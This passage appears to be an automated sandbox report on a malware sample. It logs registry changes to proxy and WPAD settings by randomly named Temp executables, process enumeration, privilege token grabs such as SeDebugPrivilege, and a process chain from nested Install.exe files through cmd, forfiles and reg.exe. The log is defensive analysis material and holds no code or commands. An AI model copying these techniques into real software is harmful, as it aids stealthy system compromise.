Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadNetworkName = "Network 3" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecisionReason = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0034000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0034000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadNetworkName = "Network 3" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecisionTime = a0e34133eabdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000005000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0034000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C} C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDetectedUrl C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecisionTime = a04b774aeabdda01 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDetectedUrl C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecisionReason = "1" C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecisionTime = a0e34133eabdda01 C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecisionTime = 8050724ceabdda01 C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{FC27B7C9-9C0E-4DFA-AFB9-E6E40D75AC2C}\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Users\Admin\AppData\Local\Temp\eqfCDMxNLExrjrYoz\YZZOhqeJLJasQiW\krgNbNW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\8e-88-f3-84-af-8e\WpadDecision = "0" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A
N/A N/A C:\Windows\Temp\HKomOEKiubDeyUja\dZrwMJGlvAMcffe\rAJqWeG.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 1924 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\8cc0583dfa0b39385cd6c082c2debc2ea743dee8a5240d9edfb805dc2fe8c0d5.exe C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 3044 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zS18FD.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\7zS1B7C.tmp\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2716 wrote to memory of 2608 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2608 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2808 wrote to memory of 2868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\forfiles.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2868 wrote to memory of 2636 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
PID 2636 wrote to memory of 2720 N/A C:\Windows\SysWOW64\cmd.exe \??\c:\windows\SysWOW64\reg.exe
